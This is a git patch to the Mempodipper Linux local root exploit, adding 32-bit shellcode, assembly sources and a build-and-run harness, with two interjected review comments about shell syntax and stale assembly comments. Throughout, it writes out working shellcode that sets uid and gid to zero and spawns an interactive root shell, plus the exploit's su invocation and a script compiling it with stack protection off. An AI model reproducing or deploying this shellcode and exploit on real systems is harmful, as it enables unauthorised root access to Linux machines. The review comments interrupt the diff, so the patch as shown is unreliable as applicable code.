From 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sun, 22 Jan 2012 06:16:39 +0100
Subject: Add 32bit shellcode.
---
 build-and-run-shellcode.sh | 6 ++++++
 harness.c | 7 ++++++
 mempodipper.c | 12 +++++++----
 run-shellcode.sh | 2 --
 shellcode-32.s | 53 ++++++++++++++++++++++++++++++++++++++++++++++
 shellcode-64.s | 4 ++--
 6 files changed, 76 insertions(+), 8 deletions(-)
 create mode 100755 build-and-run-shellcode.sh
 create mode 100644 harness.c
 delete mode 100755 run-shellcode.sh
 create mode 100644 shellcode-32.s
diff --git a/build-and-run-shellcode.sh b/build-and-run-shellcode.sh
new file mode 100755
index 0000000..0a8a34b
--- /dev/null
+++ b/build-and-run-shellcode.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+if [ "$1" == "32" ]; then
+ nasm -o /dev/stdout shellcode-32.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -m32 -fno-stack-protector -z execstack -o harness harness.c && ./harness
+else
+ nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
+fi
diff --git a/harness.c b/harness.c
new file mode 100644
index 0000000..10bf6ce
--- /dev/null
+++ b/harness.c
@@ -0,0 +1,7 @@
+unsigned char buf[] =
+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+void main() { (*(void(*)())buf)(); }
diff --git a/mempodipper.c b/mempodipper.c
index 1fb8cc2..fb20c26 100644
--- a/mempodipper.c
+++ b/mempodipper.c
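Review bot: The test on the second line of build-and-run-shellcode.sh, `[ "$1" == "32" ]`, uses the bash-only `==` operator under a `#!/bin/sh` shebang; on systems where sh is dash or another POSIX shell, `[` reports an "unexpected operator" error and the script silently falls through to the 64-bit branch regardless of the argument. The POSIX form is `if [ "$1" = "32" ]; then`. Separately, the `void main()` that both branches echo into harness.c is not a valid C `main` signature and gcc warns on it; `int main()` keeps the harness strictly conforming. The same `==`/`void main()` text also appears verbatim in the generated harness.c hunk below, which is regenerated by this script.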
@@ -203,24 +203,28 @@ int main(int argc, char **argv)
 lseek64(fd, offset, SEEK_SET);
 #if defined(__i386__)
- // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php
+ // See shellcode-32.s in this package for the source.
 char shellcode[] =
- "\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
- "\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
+ "\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+ "\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
+ "\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
+
 #elif defined(__x86_64__)
+ // See shellcode-64.s in this package for the source.
 char shellcode[] =
 "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
 "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
 "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
 "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+
 #else
 #error "That platform is not supported."
 #endif
 printf("[+] Executing su with shellcode.\n");
 execl("/bin/su", "su", shellcode, NULL);
 } else {
- sleep(0.01);
 char pid[32];
 sprintf(pid, "%d", parent_pid);
 printf("[+] Executing child from child fork.\n");
diff --git a/run-shellcode.sh b/run-shellcode.sh
deleted file mode 100755
index 5ffcf39..0000000
--- a/run-shellcode.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/sh
-nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax ; eax = 0
+push eax ; push eax
+push 0x68732f6e ; push //bin/sh
+push 0x69622f2f
+mov ebx,esp ; set ebx (arg 1) to top of stack
+
+xor edx,edx ; edx = 0
+mov dx,'-i' ; edx = '-i'
+push edx ; push edx to stack
+mov eax,esp ; set eax to top of stack
+
+xor edx,edx ; edx = 0
+
+; so at this point:
+; ebx is a pointer to '//bin/sh'
+; eax is a pointer to '-i'
+; edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx ; push edx to stack
+push eax ; push eax to stack
+push ebx ; push ebx to stack
+mov ecx,esp ; set ecx (arg 2) to top of stack
+
+xor edx,edx ; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb ; al = 0x3b, which is the exec call
+int 0x80
diff --git a/shellcode-64.s b/shellcode-64.s
index 2514ed2..f465c5d 100644
--- a/shellcode-64.s
+++ b/shellcode-64.s
@@ -19,13 +19,13 @@ mov sil,0x2
 mov al,0x21
 syscall
-; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)
 mov qword rbx,'//bin/sh' ; rbx = //bin/sh
 shr rbx,0x8 ; remove leading / from rbx
 push rbx ; push rbx to stack
 mov rdi,rsp ; set rdi (arg 1) to top of stack
-xor rbx,rbx
+xor rbx,rbx ; rbx = 0
 mov bx,'-i' ; rbx = '-i'
 push rbx ; push rbx to stack
 mov rcx,rsp ; set rcx to top of stack
--
cgit v1.2.3-59-g8ed1b
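Review bot: Two comments in the new shellcode-32.s contradict the instructions they annotate, which looks like text carried over from shellcode-64.s while porting. The second-to-last line reads `mov al,0xb ; al = 0x3b, which is the exec call`, but the operand is 0xb (execve on i386); 0x3b is the x86-64 number, so the comment should be `mov al,0xb ; al = 0xb, execve on i386`. Likewise `xor edx,edx ; rdx (arg 3) = 0` names a 64-bit register in a `BITS 32` file and should read `xor edx,edx ; edx (arg 3) = 0`. A reader cross-checking the bytes in mempodipper.c against this listing will otherwise be misled by the stale numbers.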